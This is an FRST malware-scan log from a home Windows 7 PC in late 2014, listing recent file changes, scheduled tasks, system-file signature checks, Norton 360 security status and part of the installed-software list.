2014-11-06 20:33 - 2014-11-06 20:43 - 00000000 ____D () C:\Program Files (x86)\Strife
2014-11-06 20:09 - 2014-11-06 20:26 - 1778598272 _____ () C:\Users\MoM\Downloads\StrifeWindows-0.4.0.7 (1).exe
2014-11-06 20:08 - 2014-11-06 20:08 - 00127996 _____ () C:\Users\MoM\Downloads\StrifeWindows-0.4.5.1 (1).torrent
2014-11-06 20:07 - 2014-11-06 20:07 - 00127996 _____ () C:\Users\MoM\Downloads\StrifeWindows-0.4.5.1.torrent
2014-11-06 19:55 - 2014-11-07 15:57 - 00000000 ____D () C:\FRST
2014-11-06 19:54 - 2014-11-06 19:55 - 02114560 _____ (Farbar) C:\Users\MoM\Desktop\FRST64.exe
2014-11-06 17:51 - 2014-11-06 17:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-11-06 17:51 - 2014-09-26 18:42 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-11-06 17:51 - 2014-09-26 18:36 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-11-06 17:51 - 2014-09-26 18:36 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-11-06 17:51 - 2014-09-26 18:35 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-11-06 17:50 - 2014-11-06 17:51 - 00004714 _____ () C:\Windows\SysWOW64\jupdate-1.7.0_71-b14.log
2014-11-04 16:57 - 2014-11-04 16:57 - 03060320 _____ (Symantec Corporation) C:\Users\MoM\Downloads\NPE.exe
2014-11-03 18:13 - 2014-11-06 17:33 - 00000324 _____ () C:\Windows\Tasks\HPCeeScheduleForMoM.job
2014-11-03 18:13 - 2014-11-05 17:11 - 00003174 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForMoM
2014-11-03 17:44 - 2014-11-03 17:44 - 00003416 ____N () C:\bootsqm.dat
2014-11-03 17:43 - 2014-11-03 17:43 - 00000000 __SHD () C:\found.001
2014-10-31 22:02 - 2014-10-31 22:02 - 00000000 ____D () C:\Windows\SysWOW64\N360_BACKUP
2014-10-30 18:52 - 2014-10-30 18:52 - 00000000 ____D () C:\Users\MoM\AppData\Local\ASworks
2014-10-30 18:51 - 2014-11-03 19:17 - 00000000 ____D () C:\Users\MoM\AppData\Local\Ovxics
2014-10-28 17:48 - 2014-10-28 17:48 - 00002954 _____ () C:\Windows\System32\Tasks\{028D6754-B91E-48E6-B4CD-B5C5FE824D0D}
2014-10-28 17:46 - 2014-10-28 17:46 - 00002954 _____ () C:\Windows\System32\Tasks\{C412F7C1-C691-4EFB-ADF0-5BEFDC15A9DE}
2014-10-28 17:44 - 2014-10-28 17:44 - 00002954 _____ () C:\Windows\System32\Tasks\{D658EF69-9FFE-447C-B8F2-3646868E5B4A}
2014-10-28 17:44 - 2014-10-28 17:44 - 00002954 _____ () C:\Windows\System32\Tasks\{CCB504FD-5FE8-4186-973E-917BD2827037}
2014-10-28 17:43 - 2014-10-28 17:43 - 00002954 _____ () C:\Windows\System32\Tasks\{F7EBFBE8-77E6-4981-A199-E4A965F6B157}
2014-10-28 17:42 - 2014-10-28 17:42 - 00002954 _____ () C:\Windows\System32\Tasks\{B23BCC20-3143-42BB-AEE7-28373E021FD9}
2014-10-27 17:58 - 2014-10-27 17:58 - 00000000 ____D () C:\Windows\System32\Tasks\Norton 360
2014-10-27 17:55 - 2014-10-27 17:55 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2014-10-27 17:55 - 2014-10-27 17:55 - 00008222 _____ () C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2014-10-27 17:55 - 2014-10-27 17:55 - 00002393 _____ () C:\Users\Public\Desktop\Norton 360.lnk
2014-10-27 17:54 - 2014-10-27 17:55 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2014-10-27 17:54 - 2014-10-27 17:54 - 00000000 ____D () C:\Program Files (x86)\Norton 360
2014-10-27 17:51 - 2014-10-27 17:51 - 00001296 _____ () C:\Users\MoM\Desktop\Norton Installation Files.lnk
2014-10-27 15:56 - 2014-11-05 16:59 - 00000000 ____D () C:\Users\MoM\AppData\Local\LogMeIn Rescue Applet
2014-10-26 19:47 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-26 19:47 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-26 19:47 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-26 19:47 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-26 19:47 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-26 19:47 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-26 19:47 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-26 19:47 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-26 19:47 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-26 19:47 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-26 19:47 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-26 19:47 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-26 19:47 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-26 19:47 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-26 19:47 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-26 19:47 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-26 19:47 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-26 19:47 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-26 19:47 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-26 19:47 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-26 19:47 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-26 19:47 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-26 19:47 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-26 19:47 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-26 19:47 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-26 19:47 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-26 19:47 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-26 19:47 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-26 19:47 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-26 19:47 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-26 19:47 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-26 19:47 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-26 19:47 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-26 19:47 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-26 19:47 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-26 19:47 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-26 19:47 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-26 19:47 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-26 19:47 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-26 19:47 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-26 19:47 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-26 19:47 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-26 19:47 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-26 19:47 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-26 19:47 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-26 19:47 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-26 19:47 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-26 19:47 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-26 19:47 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-26 19:47 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-26 19:47 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-26 19:47 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-26 19:47 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-26 19:47 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-26 19:47 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-26 19:47 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-26 19:47 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-26 19:47 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-26 19:47 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-26 19:45 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-26 19:45 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-26 19:43 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-26 19:43 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-26 19:43 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-26 19:43 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-26 19:43 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-26 19:43 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-26 19:43 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-26 19:43 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-26 19:42 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-26 19:42 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-26 14:15 - 2014-10-26 14:15 - 00000000 ____D () C:\Users\MoM\AppData\Local\{F78AF8B4-B0A6-45F5-A424-303303B4E154}
2014-10-20 17:01 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-18 20:04 - 2014-10-18 20:04 - 00000000 ____D () C:\Users\MoM\AppData\Local\{5DB21507-2E68-481A-9EEF-DD2C05800DB9}
2014-10-12 17:50 - 2014-10-12 17:50 - 00000000 ____D () C:\Users\MoM\Documents\My Curse
2014-10-10 17:23 - 2014-10-10 17:23 - 00000000 ____D () C:\Users\MoM\AppData\Local\{E5D4237F-BC65-4853-BAD4-9368AD6F083F}
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 15:59 - 2012-05-11 22:03 - 01081880 _____ () C:\Windows\WindowsUpdate.log
2014-11-07 15:57 - 2013-10-04 22:57 - 00000090 _____ () C:\Users\MoM\AppData\Roaming\WB.CFG
2014-11-07 15:57 - 2013-10-04 21:57 - 00000284 _____ () C:\Windows\Tasks\DigitalSite.job
2014-11-07 15:54 - 2013-04-13 17:33 - 00000000 ___RD () C:\Users\MoM\Google Drive
2014-11-07 15:54 - 2012-05-11 22:26 - 00000000 ____D () C:\ProgramData\PDFC
2014-11-07 15:53 - 2012-09-23 12:48 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-07 15:52 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-07 15:52 - 2009-07-13 23:51 - 00099590 _____ () C:\Windows\setupact.log
2014-11-07 07:04 - 2009-07-13 23:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-07 07:04 - 2009-07-13 23:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 23:24 - 2012-09-22 20:14 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\Skype
2014-11-06 22:06 - 2012-09-23 12:48 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-06 21:30 - 2013-05-10 20:25 - 00000920 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000UA.job
2014-11-06 21:30 - 2013-05-10 20:25 - 00000898 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000Core.job
2014-11-06 21:21 - 2012-10-01 20:51 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-06 21:12 - 2012-09-22 20:12 - 00003910 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{79ECE3BD-C8A8-4F1B-9772-7865629DE2A9}
2014-11-06 20:39 - 2014-09-13 22:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Strife
2014-11-06 20:39 - 2012-05-11 22:27 - 00065157 _____ () C:\Windows\DirectX.log
2014-11-06 17:51 - 2013-12-08 08:44 - 00000000 ____D () C:\ProgramData\Oracle
2014-11-06 17:51 - 2012-09-23 08:11 - 00000000 ____D () C:\Program Files (x86)\Java
2014-11-06 17:49 - 2013-12-26 13:28 - 00000000 ____D () C:\Users\MoM\AppData\Local\NPE
2014-11-06 17:42 - 2014-07-23 22:24 - 00000000 ____D () C:\NPE
2014-11-06 17:32 - 2010-11-20 22:47 - 02463240 _____ () C:\Windows\PFRO.log
2014-11-05 20:01 - 2013-11-30 01:03 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\TS3Client
2014-11-05 19:02 - 2014-03-24 17:35 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\.minecraft
2014-11-05 19:01 - 2014-04-08 21:07 - 01195520 ___SH () C:\Users\MoM\Downloads\Thumbs.db
2014-11-04 17:41 - 2012-09-23 09:44 - 00000000 ____D () C:\Users\MoM\AppData\Local\CrashDumps
2014-11-04 17:20 - 2009-07-14 00:13 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 17:11 - 2012-11-14 21:13 - 00000432 _____ () C:\Windows\system32\Drivers\etc\hosts.ics
2014-11-03 19:29 - 2012-12-10 15:45 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-11-03 19:29 - 2012-09-24 15:15 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-11-03 18:10 - 2013-04-13 17:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-11-02 14:36 - 2014-09-19 06:28 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-11-02 14:36 - 2012-09-22 20:14 - 00000000 ____D () C:\ProgramData\Skype
2014-11-01 12:01 - 2012-10-11 22:49 - 00000000 ____D () C:\Windows\Minidump
2014-11-01 12:00 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\110114-50903-01.dmp
2014-11-01 00:08 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\110114-47861-01.dmp
2014-10-31 23:09 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\110114-51417-01.dmp
2014-10-31 12:38 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\103114-46254-01.dmp
2014-10-30 22:23 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\103014-53648-01.dmp
2014-10-30 20:14 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\103014-52587-01.dmp
2014-10-27 18:32 - 2012-09-30 08:25 - 00003214 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForMOM-HP$
2014-10-27 18:32 - 2012-09-30 08:25 - 00000338 _____ () C:\Windows\Tasks\HPCeeScheduleForMOM-HP$.job
2014-10-27 17:57 - 2012-09-23 07:53 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2014-10-27 17:57 - 2012-05-11 22:30 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 17:55 - 2012-09-23 08:01 - 00003206 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-27 17:55 - 2012-09-23 08:01 - 00000000 ____D () C:\Program Files\Common Files\Symantec Shared
2014-10-27 17:51 - 2012-09-23 07:53 - 00000000 ____D () C:\Users\Public\Downloads\Norton
2014-10-27 16:06 - 2009-07-13 23:45 - 00355528 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-27 16:04 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-27 15:35 - 2012-09-23 09:38 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-27 15:05 - 2013-08-14 20:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-27 15:01 - 2012-09-23 12:49 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-27 15:01 - 2012-09-23 12:48 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-27 05:38 - 2013-01-24 18:23 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-26 21:11 - 2012-09-23 08:06 - 00000000 ____D () C:\Users\MoM
2014-10-26 21:09 - 2014-09-17 16:59 - 00000000 ____D () C:\Users\MoM\Downloads\Pokemon Red 2.5
2014-10-26 21:09 - 2014-04-27 13:52 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 21:09 - 2014-03-14 19:52 - 00000000 ____D () C:\Users\MoM\Downloads\Tardis Download
2014-10-26 21:09 - 2013-03-05 16:13 - 00000000 ____D () C:\Users\MoM\Downloads\csa folder
2014-10-26 21:09 - 2012-05-11 22:13 - 00000000 ____D () C:\ProgramData\RoxioNow
2014-10-26 21:09 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\registration
2014-10-26 19:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-26 19:29 - 2014-06-09 14:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 19:29 - 2014-06-09 14:23 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 19:29 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat
2014-10-26 19:29 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-10-26 19:27 - 2012-09-23 08:00 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-26 19:23 - 2012-05-11 22:18 - 00000000 ____D () C:\ProgramData\Symantec
2014-10-26 19:22 - 2012-09-23 09:38 - 00000000 __RHD () C:\MSOCache
2014-10-26 18:51 - 2012-09-23 08:01 - 00000000 ____D () C:\Program Files\Symantec
2014-10-20 16:44 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Msdtc
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-20 16:43 - 2014-09-17 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TI Tools
2014-10-20 16:43 - 2014-07-18 18:46 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-20 16:43 - 2013-06-10 15:39 - 00000000 ____D () C:\ProgramData\NexonUS
2014-10-20 16:30 - 2014-09-17 17:20 - 00000000 ____D () C:\Program Files (x86)\TI Education
2014-10-20 16:30 - 2012-09-23 12:48 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-18 19:04 - 2012-09-22 20:11 - 00090096 _____ () C:\Users\MoM\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-18 18:40 - 2013-03-23 21:18 - 00000000 ____D () C:\Users\MoM\AppData\Local\Halfbrick
2014-10-09 14:37 - 2009-07-14 00:08 - 00032608 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
Some content of TEMP:
====================
C:\Users\MoM\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
Ran by MoM at 2014-11-07 16:00:06
Running from C:\Users\MoM\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Norton 360 (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton 360 (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton 360 (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Agatha Christie - Peril at End House (x32 Version: 2.2.0.95 - WildTangent) Hidden
Airport Mania (x32 Version: 2.2.0.95 - WildTangent) Hidden
Apple Application Support (HKLM-x32\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Install Manager (HKLM\...\{BCC01139-903A-6FC7-3358-85B0AE332601}) (Version: 3.0.829.0 - ATI Technologies, Inc.)
Azteca (x32 Version: 2.2.0.97 - WildTangent) Hidden
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Bing Maps 3D (HKLM\...\{6ACE7F46-FACE-4125-AE86-672F4F2A6A28}) (Version: 4.0.903.16005 - Microsoft Corporation)
Blio (HKLM-x32\...\{9368DDD5-CE7F-4BD7-A83A-F00FABE338EC}) (Version: 2.2.6699 - K-NFB Reading Technology, Inc.)
Bounce Symphony (x32 Version: 2.2.0.97 - WildTangent) Hidden
Build-a-lot (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cake Mania (x32 Version: 2.2.0.95 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
